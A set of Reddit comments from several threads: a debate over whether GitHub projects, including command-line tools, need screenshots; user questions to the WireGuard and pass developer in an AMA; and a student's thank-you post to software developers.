I can (well, I did) write a command-line program that tells me how to [get across an uncharted ocean](http://arachnoid.com/sailbook) using celestial navigation equations and a sextant. Is there a visual? No. Is that important? No. The reason? I can mentally visualize the program's structure and modes of operation, and a picture wouldn't help.
This comment has been overwritten by an open source script to protect this user&apos;s privacy.  It was created to help protect users from doxing, stalking, and harassment. 

   If you would also like to protect yourself, add the Chrome extension [TamperMonkey](https://chrome.google.com/webstore/detail/tampermonkey/dhdgffkkebhmkfjojejmpbldmpobfkfo), or the Firefox extension [GreaseMonkey](https://addons.mozilla.org/en-us/firefox/addon/greasemonkey/) and add [this open source script](https://greasyfork.org/en/scripts/10380-reddit-overwrite).   

 Then simply click on your username on Reddit, go to the comments tab, scroll down as far as possibe (hint:use [RES](http://www.redditenhancementsuite.com/)), and hit the new OVERWRITE button at the top.   

  Also, please consider using [Voat.co](https://voat.co) as an alternative to Reddit as Voat does not censor political content.
I don't understand this... For most projects on github that are CLI or are libraries what are you going to screenshot, a terminal with text?
Not worth the time and effort for non-gui based programs or libraries.
Would it matter? A program does what you want it to do or it does not. If it does you can ofcourse make a pull request for your screenshot to be in the readme.md
Doing God's work here buddy ;) 
Github's a code repo, not a marketing platform.

So send a pull request?

But really I think github is for code. It isn't really for documenting / promoting and application.
I figure if the developer doesn't care enough to post a screenshot then it's not worth wasting time on. 
Github is not some app store or something, if you want nice descriptions and pictures, stars, comments all that jazz using something like GNOME Software seems like a better place to look.
It's not like it is an investment to just install and see how you like it.
If it does matter, do make contributions on those things, just the assumption it isn't done out of some malice is not going to help.
I'm more interested into a project with a proper documentation, readme and makefile.

Really? A screenshot for an text based CLI programm? I expect the people to download it via git, fast! 
It's inconvenient to make screenshots like that, so I don't see the point for most applications. Themes, visual tweaks, and other such things kinda need it, but I don't see the point for a lot of the more utilitarian interfaces.

Programmers on linux tend to be proud of the function of their programs before the visual aspects, and besides, if you need a gif for a command line program, you're using the command line wrong.
[deleted]
Still better than visual deafness, though.
Man, I had this problem when I was a kid. I didn't have a spare machine to install Linux on so I'd just look at screenshots instead. I didn't know what snapshots were either 'cause in colloquial usage a "snapshot" is a picture. So I'd always download snapshots and wonder what the heck I'd do with these .tar.gz files. To make things even more confusing sometimes there WOULD be screenshots in them. ???
The more multimedia you add to linux tutorials, the more learning linux relies on a GUI. As long as we ensure that the best methods of learning are available in both text and visual format it should be fine.
I don't really see why we would screen shot things. I don't really have any idea what you are talking about when you talk about visual blindness. We use computers, not toys, we don't need a flashy picture. We need input, and output, and then the source if we need to know how that is done.
How about letting users of the software projects contribute screenshots?

Is it fair to lay the responsibility for everything on the person who writes the code?
I'll screenshot the code if that helps.
No thank you. I don't want pretty pictures. I want a text description I can read and understand. Far more informative than a screenshot. 
Any examples of projects doing it wrong and projects doing it right?
this has gotten much better, to a point where even most of the popular vim plugins have a gif showing off their functionality.
no.
Wow! Almost 1000 upvotes on my 1st day of sign up! Thanks!
Generally you have a point.

But not always. At least in the Emacs community, people now often generate animated gifs to demo add-on packages. For example here: http://tuhdo.github.io/helm-intro.html. The bad part about GIFs is that they loop and you cannot stop them easily, so they resort to some "START" text as an indicator when it begins ...

But yeah, occassianally you still find even a color theme package on github with not even a screen shot ...


I sent a link of my bash game [Back in a minute](https://github.com/sigg3/biamin) to [Linux Voice](https://www.linuxvoice.com/issue-2-is-out/), and they ran a software mention of it in the magazine with a screenshot of the source. I then scanned the dead tree magazine in xsane, cropped it in the Gimp and uploaded it to the [homepage of the game](http://sigg3.net/biamin/260). Does that count?
It is actually non-trivial to do a good screencast. For interactive terminal applications with a focus on keyboard commands, you really want a way to show which keys are being used. For my [dvtm](https://github.com/martanne/dvtm) and [vis](https://github.com/martanne/vis) projects I settled for [mkcast](https://github.com/KeyboardFire/mkcast) which uses screenkey internally and is a big mess. As a result the demos are rarely updated and by now completely out of date. Actually I just noticed that mkcast is apparently obsolete and the author recommends [xscast](https://github.com/KeyboardFire/xscast).

I would really like to use [asciinema](https://asciinema.org/), it would allow to pause the video, adjust playback speed and copy paste stuff out of the demo. Unfortunately it currently does not support a [way to overlay keyboard input](https://github.com/asciinema/asciinema/issues/105).
[deleted]
> consider uploading at least one screenshot per your program, even if it is a text based program

Uhhh... seriously?
"We have a serious problem of user entitlement in open source"

http://hueniverse.com/2016/01/26/how-to-use-open-source-and-shut-the-fuck-up-at-the-same-time/
If I was a FOSS developer, I'd upload goatse as a screenshot just to annoy you. #UseTheSourceLuke
Compile and see for yourself.
> animated gif

No thanks.
If they're on GitHub and you feel the documentation isn't up to par - why not submit a pull request?
If it's a github project you're welcome to make your own screenshots and submit a pull request against the README.

Make it your quest to unblind these projects 
Pull requests accepted.
What exactly would be the point of a screenshot of a program with a text interface? It's a program; it fills a function. You don't install programs because they look pretty, you install them because they help you do whatever you imagine the world would have you do next.

Also, “unblinders”? Try ‘functionally blind’, if you want a fair counterterm.
Pull requests welcome.
This sounds about as useful as YouTube videos teaching command line. Text is best in text.
I don't want to sell my software. I provide it to the public in the hope that it is useful. Why should I do the effort to add advertising screenshots to the description page?
post a bug report about it.

zero snark/ sarcasm.
Screenshots are for muggles
Here's an idea. Just buy a commercial alternative if you feel the need to complain about this. This is one of the most "the whole world owes me everything I want" privileged posts I've ever seen. You are getting something for free, something that someone has devoted hours upon hours to develop without any pay. They get absolutely nothing for you to download and use their software. Instead of being grateful for it, you're complaining about the lack of screenshots. You are a privileged, self-centered asshole. 

Edit: Downvote me if you want. It doesn't change the fact that in the time it took to post this on reddit, the guy could have contributed a screenshot for the project and actually made a contribution to open source software.
[deleted]
There are no screenshots in tty1.
> making a screenshot on Linux in 2016 is a trivial thing

Could you make ... a video? Last time I tried I did run into a couple issues, wouldn't exactly call it trivial.
2/10 not enough memes
GitHub flavored Markdown is to blame.

Ow. Downvotes.. Let me clarify:

README.md is to blame.
Real programmers only use consoles, dude... consoles dude. Why do you program? ... to solve problem and you don't need UI, GUI and weird shit on the screen to solve problem ...
Hey everybody!

Happy to answer your questions on any of my projects, security research, things about my computer and OS setup, or other technical topics.

I'll be looking for questions in this thread during the next week or so, and answering them live, while I'm awake (CEST/UTC+2 hours). I also help mod /r/WireGuard if readers want to participate after the AMA.

---

WireGuard project info, to head off some more basic questions:

* [Main site](https://www.wireguard.com)
* [Installation for many Linux distros and other OSes](https://www.wireguard.com/install/)
* [Code repos](https://www.wireguard.com/repositories/)
* [White paper, with crypto details](https://www.wireguard.com/papers/wireguard.pdf)
* [Formal verification results](https://www.wireguard.com/formal-verification/)
* [Mailing list](https://lists.zx2c4.com/mailman/listinfo/wireguard)
* IRC channel - `#wireguard` on Freenode

----


Proof: https://twitter.com/EdgeSecurity/status/1288438716038610945
Hello. What's your favourite Linux distribution?
Hey Jason. I use \`pass\` all the time and wanted to thank you for it!
Can you talk a bit more about being a kernel developer?

\- What drove you to this road of Security and Kernel development?

\- Which resources you used when you started and are still relevant today?

\- If you were to start the whole process today from scratch: What would be the paths/steps you would take to improve the process of becoming a kernel developer / security research?

\- How hard it was to find the first job with this set of skill?

Also: Emacs or Vim?
What happend with the kernel crypto changes you wanted to make in the end?

Do you think the Cloud providers will suddenly come out with fancy new services that just run Wireguard under the hood? If so what do you hope they will be called?

AWW (Amazon Wireguard Woo?)?

Also just to say thanks for wireguard and pass, I don't use them yet, but know they are great tools there ready for when I need to solve problems.
When do you expect major mobile operating systems to natively support wireguard out of the box?
You seem like THE guy to fix my moms printer :D
Hey Jason,

Thanks for all your contributions to different open-source projects! I really enjoy using WireGuard. There is a discussion in WireGuard mailing list a while ago about traffic obfuscation. Are you still considering to add that into wireguard?

Also, do you mind sharing why you pick \`zx2c4\` as your username? :)
How is it that you're able to spend so much time making free software like WireGuard? How are you funded? Who funds you?
How painful was writing Wireguard port for Windows compared to Linux and BSD? Programming anything operating on the networking level 3 on Windows doesn't sound fun lol.

Also what Desktop environment/WM and program you use for coding? Vim, emacs, Visual studio Code? Thanks for all that you do.
What's your formal educational background? How did you get into security research?

Thanks in advanced.
How long were you kicking around the idea of wireguard before actual development / public announcement? Any new OSS project you are thinking about starting, or wish somebody else would start?
[deleted]
WireGuard is awesome!

Are you planning to add any quantum-safe authentication scheme in it? Do you have any favorite quantum-safe algo from the NIST PQC competition?
How does the kernel-maintainence of different distros affect your work, are distros that are keeping old kernels alive while backporting the newest security patches and some limited new functionality a hinderance for Wireguard?
[deleted]
When you are developing something like WireGuard, how are you going about assuming it will run on most hardware? Do you use different images of different firmwares for instance and then attempt to use it in some automated build?
So this is a weirdly technical one, but bear with me here: is there any work/plan to document the WireGuard netlink API semantics? The contents of the messages are fairly self-explanatory, but I've had to dig through the code to figure out some less obvious things (e.g.: is replacing the configuration on an interface atomic? does it kick out connected peers? what happens if you try to set a configuration with replace_peers at top level and delete_peer in the same message? etc). The reason I'm asking is that I hope to finally make some time and rewrite my wgctrl-rs library to use native Netlink (and a less terrible API).
Hello & thanx for the opportunity to ask:

Does pass' description as "the unix password manager" refer to the philosophy or was it a genuine Unix program earlier?

Btw I love it!
[deleted]
Hello!

I'd like to ask about Wireguard's forward/backward compatibility policy, is it planned (as in, a target the project aims for) or strictly avoided?

I ask this because there are many great protocols and algorithms, such as TLS, which have had planned ahead and added blank fields to add more functionality later on, but still being backwards compatible, but because of [protocol ossification,](https://en.wikipedia.org/wiki/Protocol_ossification) such fields couldn't be used and workarounds needed to be used, making the flexibility/added blank fields point moot. 

So, does wireguard try to provide some level of flexibility/{back,for}ward compatibility in that sense? Or does the project break compat anytime the current algorithms/crypto primitives/etc aren't seen as sufficient/state-of-the-art anymore?

As a second question, how is wg-dynamic doing? Have things like how IPs get distributed/etc already been figured out? I remember reading about it a while back in the mailing lists, but I haven't heard much about it since. Is there any alpha/beta release I can try?

Thanks for your work! I love Wireguard's simplicity and speed. It allowed me to do many network setups and such in 30 minutes, instead of three hours.
Not as much as a question rather than a statement of appreciation for the work you've done on WireGuard. I use it heavily within Qubes with multiple instances of running in multiple VMs for different connections of differing levels of trust. And have been blown away with its stability, reliability, & performance. Same goes with the reference WireGuard app on my Lineage OS device.

If at all have you got interesting examples of "unconventional" uses for WireGuard in the wild?

Also how are efforts of WireGuard being ported to FreeBSD going now that it's been supported by OpenBSD? It would be awesome to use WireGuard within pfsense on my firewall.
Love using WireGuard! Is TCP as transport on the Roadmap? Now using socat and shadowsocks but something small and natively available is welcomed in environments dropping most UDP.
I occasionally find myself in a situation 
where I want to tunnel all traffic from a browser, but nothing else on the machine. Do you have any idea what would it take to expose a Wireguard connection as a SOCKS5 port instead of a network interface?  Would it require something major like a user-mode TCP stack?
In 2017 you gave a rather scathing audit of r/ProjectTox, it seems [nothing became of the bug ticket](https://github.com/TokTok/c-toxcore/issues/426). In layman's terms, is the protocol still secure as long as we keep our profile's secure?

My understanding of your report was it is insecure if someone steals and impersonates your key, but not technically insecure over the wire and between peers that are trusted / able to verify themselves.
Thanks for WireGuard, it so simple it's confusing :)
Just wanted to say thanks for wireguard. i could never get any other vpn to setup correctly (probably my own fault, but who knows), but wireguard is super easy to setup and understand what it is doing. so thanks for that.

2 questions for you:

1. what is your favorite kind of pizza?
2. have you had any discussions with the raspberry pi os/raspbian groups to get wireguard backported into their kernel? 

also, nice to see a kernel dev using gentoo. gentoo is the best.
Anything to say about golang?
Hey Jason! Avid follower of yours - though I don't use pass or wireguard day-to-day anymore, I take a peek at the source tree every few weeks out of sheer curiosity. Just wanted to express my thanks for everything you do.

My only question: do you have any thoughts or opinions about GPL licensing in general?
Forgive me if this is too personal. Obviously answer to your own comfort level.

## Question 1

I was once trying to learn a bit about the US presence in Antarctica, and was surprised that one of the top videos (giving a tour of the Amundsen–Scott Station) was by a guy named Donenfeld that looked suspiciously like you. A quick google search confirmed that you two were siblings from a blog post that one of you had shared, and I believe there was mention of a sister as well.

I guess my question is... what was your childhood like such that you all ended up so successful? What do you think were important elements of your childhood that would lead you to one day becoming so intelligent? I guess for lack of a better way to put it, what advice would you give to a parent to enable their child to become an extremely intelligent, talented, driven individual? (I'm not a parent—I'm asking that hypothetically because I genuinely can't figure out how else to word that question.)

## Question 2

I've always been amazed by the incredible amount of overlap that exists between math, physics, CS, philosophy, law, linguistics, music, language, typography, etc. I'm just super impressed when I meet someone or learn of someone who's extremely strong in applying precision and attention to detail to their endeavors, and I'm blown away by the breadth of fields that those types of people tend to find success in. I'm sure you'd be able to make a better list of people than I would, but I'm thinking people like Socrates and Noam Chomsky.

My questions for this part are a bit looser, I guess. Why did you study philosophy? How would you try to describe the commonalities between your experiences in philosophy, math, security research, and kernel development? If you were talking to someone who doesn't understand how a philosophy student would become an accomplished security researcher (and why that's actually not very surprising), how would you explain it? If you met a teenager who was an extremely gifted math student, what would you tell them to try to expand their horizons a bit? How would you convince them that if they're extremely good at calculus, they may in fact be on track to become a very successful lawyer, or philosopher, or writer?
Thanks for your FOSS work. Wireguard is great!
[removed]
Having created Wireguard, it's now added in the mainline kernel. Are you afraid of being targeted by countries spy agencies? Like Russia, China, USA, Israels spy agencies trying to either get dirt on you or get access to your information so they can add backdoors in wireguard?

How have you protected yourself from this?
What have you never tried, but always wanted to try? Be it the use of a technology, learning some language, going someplace or drinking a special drink.
How come you have never tried it?
I have three questions, if that's okay:

1. Given the recent pushes in the cryptographic and security communities to abandon OpenPGP and its implementations, would you be willing to migrate `pass(1)` away from PGP to a more modern approach, such as `age(1)`?
2. Also, `pass(1)` leaks metadata about both the number of accounts you are protecting, and what they are. Would you be open to storing every secret into a single file rather than separately per account?
3. This is probably out of scope, but is 2FA on the table for Wireguard?
Is there a plan to revisit the 1-tunnel limit on the Windows client any time soon? I'd really like to be able to use separate configs (i.e. home and work) simultaneously without having to kick one off - and I don't want to have to fork it to strip out the 'silly restriction' ;-)
Are your fuzzers written with libfuzzer always running? Do you feel there's parts of the code that still need fuzzers written for them?
Thanks for WireGuard, Jason!

You're hosting the source on your personal git instance and mirroring to GitHub. Have you considered that a malicious actor might try to hack your server and poison the source? Might it not be more secure to host the canonical source on GitHub?
Hey Jason, thanks so much for wireguard, I use it every day and it's really a joy to work with!

My question is a bit of a selfish one, but does the [offer of stickers](https://lists.zx2c4.com/pipermail/wireguard/2017-May/001338.html) still stand?

I sent a mail to the email address in the notice the 2 of july, but have gotten to reply.

Once again, thanks so much for the awesome software, can't wait to see more!
First of all, thanks A LOT for everything you have done. A few questions , maybe too many so just answer the ones you’d prefer!

1.	Why do you started Linux and why do you like it? (e.g being a researcher on security, there are many flaws and issues that are taking time to solve on both kernel and user land right?)
2.	what made you enrol in a course of philosophy AND maths and what benefit do you feel you got from taking both fields together?
3.	what do you do on your free time? Do you like gaming?
4.	dog or cat person? Ahah
5.	where do you think stuff like Linux userland security should evolve to? (X11, wayland, sandboxing, etc)


Again, thanks for everything. Going to donate for WG!
Can you tell us the history/reasons/design behind the wireguard logo/icon?
If I understand it correctly, on Linux Wireguard only deals with the tunnel, and it's the user's task to set up routing (automated with postup and postdown)

But what is the case with the Windows client? Is it trying to do this automatically? Currently I have 2 Windows machines (10 1809 and 1903), and both produces different problems.
Where can I get more of those wireguard stickers you always hand me at fosdem? I'm out and would like to support the project. (Can I suggest creating an official merch store cause I'd like a T-shirt too)
No question really, just a thank you. WireGuard is so unintrusive, I routinely forget that it's on.

I have a couple of suggestions for cgit (another one of awesome projects from Jason).

* Instead of heavyweight Markdown renderers, cmark could honestly be made the default or even a dependency (or cmark-gfm, for GitHub support). It works instantaneously on my busy Raspberry Pi instance, while things like python-markdown struggle.
* Mobile-friendly CSS would be wonderful (albeit I'm not sure about how to implement it with minimal overhead).
what do you think about the rdrand fiasco in-kernel? (use rdrand output as last xor source instead of intermediate one which would disable most potentially existing hardware backdooring)?
Feel free to Ignore this question if it falls outside of your field of expertise (I also got to this AMA rather late, so I more than understand if you'd rather be doing other things).

Lately I've been investigating setting up a [Pi Hole DNS server](https://pi-hole.net/) to potentially increase my security against online malware, but I haven't been able to find a thorough answer on if it's really worth bothering with if you already use a browser based ad-blocker, like Ublock Origin. 

It seems that it may be able to catch things that a standard blocker might miss (meaning they should ideally be used in tandem). Do you see Pi hole as a worthy addition to increase security? Do you use one yourself?
Hi Jason!

I love your work with WireGuard, I've been following it for years now! The fact that you made a far better VPN compared to others with *less* code speaks to my philosophy of "less is more".

I've been working on a sort of authentication proxy for WireGuard in my free time. A go binary sits on a server with WireGuard, and opens a REST API. When it receives a POST containing a peer public key, secret API key, and timeout, it provisions the peer in WG. After the timeout, it removes the peer. This is powered by another login web page which posts to the VPN server, and a client side app to access the login page and configure the WireGuard client. The dream is that eventually this could be turned into something modular that works with active directory, AWS, etc. to provide a username/password/totp login solution for WireGuard, albeit with some security flaws.

Keep on keeping on!
Love wg on linux, but Windows, iOS, and MacOS implementations still fall behind on performance and battery life using wireguard-go. Why did you decide to write your own rust implementation rather than just pointing people to Cloudflare's boringtun? Were they developed in parallel, or did you not like the license they chose?
Hi Jason! 

What parts of the WG code are you most “nervous” about? (In terms of exploit possibilities.)

Do you think crappy enterprise VPN solutions (e.g. Fortinet, Cisco and stuff like that) eventually will be replaced by systems based on Wireguard?

Do you think we will ever see the sunset of IPv4?

Cheers!
Is there any plans to use wireguard-rs in future versions of the WireGuard iOS & Android apps? It would be great to see a production ready version of wireguard-rs.
Thanks for taking the time to answer questions!

It seems like you have done some security consulting work. What have you found the be the best path to enter into the security consulting world and  and succeed?
Maybe I'm going to get roasted for this question, but is there a way for you to make money for yourself or maintaining this project other than receiving donations?
I know that this has been answered before as "not part of Wireguard's job description", but do you have a way that you would recommend to obfuscate Wireguard traffic?  

Wireguard has been rock-solid for me.  Thank you for making such a great tool.
Thank you for your work! Wireguard seems to be the future of VPNs, and I am really looking forward for a more wider adoption, especially from VPN providers.

Currently, a few of them support WireGuard (last time I checked, NordVPN had a beta, Mullvad had full support, now also available as Firefox VPN, …), but many aren't yet jumping on it. What do you think prevent them from adopting the protocol? Do you have some discussions with them on how they can integrate it or adopt it?
I want a popup based firewall ! like opensnitch, but its still a beta...
Thanks all your work on Wireguard and 'pass'.  Any chance of an updated release of 'pass' in the near future?
Thank you for WireGuard. Yesterday it connected so fast I did a double take.
Thank you for WireGuard.
What is your purpose with your work? Do you do It just for fun, changing the world, money or something else?
What do you think of Rust and Torvald's mentioning he wants to open kernel development to using it?

Also, I'm more curious about your background as a developer. How did you get to be so accomplished? Did you parents teach you programming right after you learned the alphabet? What drives you to work so hard to get to where you're at?
How did you feel when Linus Torvalds recommended Wireguard?

I'm paraphrasing because I cant remember the exact quote he gave it.
[deleted]
Thank you for your contributions to the community and the world
Oh man, I feel like a little girl taking to a movie star. Thank you for the Wireguard!
I've seens lots of people talk about how insecure the linux kernel is lately, is this true?
I'm extra late to the party so I don't have a question. I just want to express my gratitude for your work and mention that I occasionally take a peek at your C code to  study it and inspire my own code towards excellence.
What was your reason for choosing ChaCha20, and do you see it being supported in hardware in the future just like the AES-NI instructions?
hey Man, thank you for your contributions!!!

I just somehow found out you live in France and are registered as an independent "auto entrepreneur" here? what the heck?

Maybe these are too personal, in which case no worries I would understand if you don't answer, but why France? How does that go, are you liking it? having fun? 

Did you find a market for you company and are you able to work with french companies?you able to make decent money ? I know the french system could  appear slow and broken for someone coming from the US lol. you still want to live here ? haha!!! :-)

kind of surprised a big US techie chooses to live in France instead of working for some Tech Giant in the bay area :-)

anyway, cheers!!!!
WireGuard is in Android 12 already!  
[https://android.googlesource.com/kernel/common/+/0933807d35a8ce84f16e5bfef17a35e7791efb60](https://android.googlesource.com/kernel/common/+/0933807d35a8ce84f16e5bfef17a35e7791efb60)  
[https://android.googlesource.com/kernel/common/+/a5d10f0defc377d43672b304e31e37a517fbf0bf](https://android.googlesource.com/kernel/common/+/a5d10f0defc377d43672b304e31e37a517fbf0bf)
[deleted]
Hi. I love the simplicity of Wireguard, so thanks a lot!

I recently struggled with finding a way to bundle wireguard with an application such that I can distribute an executable that connects to a wg-vpn without messing with the host systems networking by adding an interface. Also without requiring root permissions to run. It is suprisingly hard to achieve this.

What is the reasoning here? Is this use-case just considered unimportant? Or are there technical limitations? (Or did I just miss something obvious?)
[deleted]
Thanks for wireguard, its so lightweight i forget i am even on a VPN when i am using it!

My question (as someone who has been developing a wireguard 2FA piece internally for the company i work at):

\- Are there any plans to add "hooks" to wireguard so that Wireguard can call out to something when a `handshake` occurs (instead of constantly asking the state of connections via `wg show wg0 dump`)?

\- Are there any plans to add TOTP support to the Wireguard Client and Server (similar to Tunsafe but native to the Wireguard Client) \[To extend this one, the Operating systems in use aren't supported by tunsafe and that project appears dead already\]

Currently the application is a web portal which a user can acquire a Wireguard Config and configure their 2FA device to recieve push notifications on when they connect \[detected from a `handshake` that hasn't been seen before or isn't already `authed` via the notification system (using `Twillio Authy`)\] (Using the Native Wireguard Client as this is available for a much larger set of Operating Systems than other variations)
Congratulations on mainline! Now that you’ve reached that goal post, what’s next for WireGuard? Do you have a new set of goals for features you would like to build, or is the idea to just keep it simple and focus on tuning and bug fixes?

If you want specifics, my personal points of curiosity around new features center around enterprise usage: 
* some way of achieving auto-expiration of peers (e.g. certificates) that doesn’t depend on me to write a garbage collector,
* better instrumentation of what is happening inside the module, 
* ability to tune/flush queues, 
* and some kind of push/event notification when things happen (new connection, new handshake, change in source IP).
did wg has any backdoor for yourself? 😜

on serious note , any thoughts for linux desktop future?

what do you think of tailscale?
What do you think of [age](https://github.com/FiloSottile/age) and would you ever consider incorporating it into `pass` as an alternative encryption backend?
Thanks for the update, and for all your efforts!
I am planning to switch to pass very soon. I just need to decide on how to sync across devices.

Some options are: GitHub, git on my own VPS (Centos 8 on Linode), Nextcloud on said VPS or Syncthing across multiple devices.

Of the above options for syncing my passwords, which would you prefer from a security perspective? And do you have any alternatives you would recommend besides what I've listed?
What was your path to where you are now?
I thought I recognized your name! I still remember when `pass` was a new project. I thought it was cool and thought you'd go onto good things. 

Good for you man!
Is it possible Wireguard will be part of Cisco Anyconnect or other mainstream VPN applications?
Who is the blackest blackhat you know?
Who is the whitest whitehat you know? (excluding spender)
What's your main build specs? How do you think GnuPG or OpenPGP could be improved? What is your opinion on social crypto projects like Keybase?
What do you think of [age](https://github.com/FiloSottile/age)? Will you considering implementing it in pass?
What's the worst technical mistake you've made and what were the consequences?  
Asking this as a hobbyist who has accidentally lost a lot of data overwriting the wrong directory. :/
Thanks for your contributions to Linux and opensource, Jason. All the best!
I'd be interested in your approach to collaboration with large established projects. How do you bring new ideas forward successfully and get from a PR to a merge?
Hi Jason!

I installed Wireguard on my OpenWRT router the other day so that all the devices on my network are on a VPN by default, and it worked like magic. Thank you so much.

I (also) wrote a shell-script password manager, and was wondering if you could provide a little feedback on it - perhaps from a security point of view.

The gist of it, is that I wanted to store all my passwords *on a remote server* protected with GPG and ssh. Also wanted to use symmetric encryption so that protecting/sharing/backing-up GPG private key files was not a thing.

https://github.com/alexlance/paw
Hi Jason! 

You wrote:

>I was actually toying with trying to fix my email setup with some new  software, \[...\] my email setup leaves much to be desired.

I am highly interested in this. Could you elaborate a little more on email?

* How would you improve your current setup?
* Do you see a future for end-to-end encrypted email?
Hopefully you see this still.

Can you recommend a forum or chat I can use to get help with Wireguard?

I'm on a symmetrical 1000/1000 line and when I went to my cousins for the week I was only seeing a max of 50Mbps download from my SMB server and for some reason speedtest.net was showing 150.

Neither speed makes sense to me. Shouldn't I see much faster speeds? 

His internet is 600 down/30 up or something. Would his upload speed have anything to do with it? I wouldnt think so myself.
How hard is to hack n-factor authentication? Can you put it in perspective or compare it to other methods to keep your info safe? My bank uses it, I am wondering if the degree of safety is good enough
How do you keep your own system secure?  Do you ever worry someone might use a 0day to take over your system and implant a backdoor into WireGuard?
thanks! I use Wire Guard daily!
No question.

I don't work in tech and have no desire too. I am just work in a gas station.

Thank you for wireguard. Its frustratingly beautiful.
I came here to say, I am a huge fan of your work. Thank you.
I love cgit and password-store.

Somewhere there's a multiverse where you and Salvatore Sanfilippo were college roommates, cranking out awesome stuff.
Can I download aircrack onto usb and run on my tablet without root to hack nearby wifi ?
Hey man can you help me out here : https://askubuntu.com/questions/1271249/unwanted-partition-and-memory-not-found-after-burning-iso-to-usb
What are you using to generate the web pages at [https://git.zx2c4.com/](https://git.zx2c4.com/) ?
This is a bit late, but I just wanted to thank you for Pass. I absolutely love being in charge of my password management and it has made me feel a lot more secure. I also learned about gpg encryption and decryption in the process.
Hey,
This is regarding `pass` - I basically use pass for managing my passwords, and honestly I just love it. It's just so nice, especially with PassFF for firefox.

However, I want to change my gpg-key (like completely - I changed my email ID) and so, I want to port all my passwords to the new key. Is that possible? Or do you suggest other alternatives instead of creating a whole new gpg key?
Thank you for Wireguard. It really has improved my life. I can access my NAS that is over LAN setup securely, quickly and easily, without learning how to use the inferior and needlessly complicated OpenVPN setup.

Although, I will admit, I am not a big fan of "pass". I prefer to use KeepassXC. It has features to search, organize, encrypt extra notes, attach files/keyfiles, auto type, etc... and hopefully will support plugins in the future.

I also sync up my KP database with Syncthing, and store a keyfile on a USB stick that I have to physically insert, which I unmount and remove later once KeePassXC is open. And I also type in a master password.

So will you ever write a replacement for kpcli that is not garbage, and doesn't use shitty Perl as its programming language of choice? XD

That was kind of a joke question, but I'm more so just curious what your stance on KeePass and KeePassXC is, and why you don't use them.

I also have many reasons for disliking KeePass, but at least it seems to get audited by security researchers, and has a few useful plugins, so I suppose that's a plus....
Is it true that there is curettnly a plan from Microsoft to sabotage Linux from inside out ?
Hi Jason,

&#x200B;

I know I'm a little late to the party. We were in touch last year when decke and I tried to fix crashes for FreeBSD implementation and I maintain the OPNsense plugin for WireGuard.

Since the adoption of it rises and more and more businesses are asking for it, also the demands are rising. Currently we are in the situation that WireGuard cannot bind to a specific source IP address. On the Linux side this was fixed via fwmark, but for FreeBSD there is no chance for romance. In the end this means that CARP (High Availability in FreeBSD) is not possible since on a cluster with one Failover IP we cannot force to only use this one.

Of course, confgured as a client, this might work, but a general approach would be highly appreciated. :)

&#x200B;

Best,

Michael
Hello!

Given path you have chosen, I don't think many people get to see as much as the rabbit hole as you do.

That being said, what is your favorite distro after being deep inside some of the most intimate parts of the kernel?
I'm fairly new to linux. What distro would be a good place to start for beginners?
I'm a wireguard user from a country with heavily restricted internet. Running wireguard on my openwrt router has been a life saver. I can't thank you enough.
Hey Jason, may I ask what keyboard you use?
Hello! Since T2 chip has been cracked down, is there a possibility of installing Linux distros in MacBook with T2 chips now?
I need help with a basic WiFi tracker that someone stole from me
To exit vim I just dont start it in the beginning, hearing all these horror stories, I had to watch a video to see of it was really that spanner 🔧 and to exit wc or wl or summit i thought was abit strange so stayed with trusty T1000
Will WireGuard ever support URLs instead of IPs for EndPoints?
As much support as WireGuard has received, you have made it clear that it could use more.  Other projects get even less. Do you have any concerns about the sustainability of open source?

Would a term for commercial licensees requiring them to give back to open source help?

Any thoughts on other possible solutions?
Thank God for this man! I can look at my porn without the CCP trying to blackmail me!
Hi everyone!

Before I begin, disclaimer: I've been meaning to find an appropriate place to post this, but I couldn't really think of one; I hope this stays up. 

I am a second-year computer science and physics undergraduate. Before I matriculated, I thought I was a tech pro when I could fix a broken Windows bootloader, configure an off-the-shelf router using its *GUI*, and slide some sliders on photos in Lightroom. Joining university was a simultaneously humbling and enlightening experience, when I realised my peers were writing hundreds, perhaps even thousands of lines of code per day; one person is a regular contributor to the Linux Kernel. Another group of people developed [this website](https://nusmods.com), to make my fellow students' lives easier when choosing our modules for the semester. Plenty others are *incredibly* talented and versatile; I felt (and still do feel) like a tiny fish in the Pacific. 

Despite that, beginning my CS career has also exposed me to dozens of FOSS initiatives and projects that I would have otherwise passed over, had I chosen another major: things like Arch Linux (I have it installed, but it is broken by my own volition and I have to find some time to reinstall it), Vim and Emacs (with respect to Vim: I know how to change modes, edit and quit, but that's it), LaTeX, KDE, the entire GNU initiative, Blender, Git (which I still don't know how to use), and so on, in no particular order. This list could get so long that it'd exhaust this post's character count.

All high-quality, professional, powerful software that gets things done, with nary a penny or cent needed to purchase these, and the complete source available to all.

That being said, even closed-source software is equally wondrous. I understand this is the Linux subreddit, but this is a general thank-you post to *everyone*, so things like MS Office 365, Adobe's suite (though slow and bloated), Windows, OS X, iOS, Apple's productivity suite, the hundreds of apps we use on our phones, and, last but not least, the AAA 3D video games. I just ran *The Witcher 3* some hours ago. I cannot fathom how hundreds of people came together to put out a masterpiece of art, entertainment and music, all for less than $30 (which is how much the GOTY version is during sales).

I suppose no one thinks about it much, but the things we have achieved in the past several decades, with semiconductor, electrical, electronic, computer and software engineering (to give the entire hardware stack) is, to reuse the title, simply magical and incredible. This post, for instance, was typed probably thousands of kilometres from any one of you reading it. And yet you *can* read it, within seconds of me hitting that 'Post' button. I can download a terabyte's worth of data in two hours flat, and were my network not the bottleneck, write all that data to a flash drive in a quarter the time. I have a slab of silicon in my computer that can render *trillions* of vertices a second, and render games that look impossibly life-like, at sixty to eighty frames a second. We fly on jet airliners that, once the VNAV and LNAV buttons are pressed, can effectively fly themselves to their destinations with minimal pilot intervention or oversight (passing over the 737 MAX). 

I'm not particularly great at problem-solving, and even when it comes to assignments, I struggle plenty, and it really is quite un-imaginable that many of these software implementations have sometimes been one-man initiatives. I have (and still do) had trouble implementing a simple linked list, or a bog-standard 3D graphics assignment. I cannot comprehend the level of understanding needed to implement so many of the complex things we take for granted today. Who on earth could have thought that we could type a button, it sends an electrical signal to a slab of silicon with impurities, and a nanosecond later, what was a white text box now has the letter on that button there? The complete hardware-kernel-driver-OS-application stack is mind-boggling, and the fact that Linux, an OS that today powers nearly every supercomputer, was written in someone's spare time, simply fails my comprehension. 

The things that everyone here does is amazing. FOSS or not, you help billions of people worldwide save effort and time. The software and hardware you develop feed, clothe, ventilate, move, cure, and entertain people. Thank you.

___

**TL;DR:** title.
It's all iterative work.

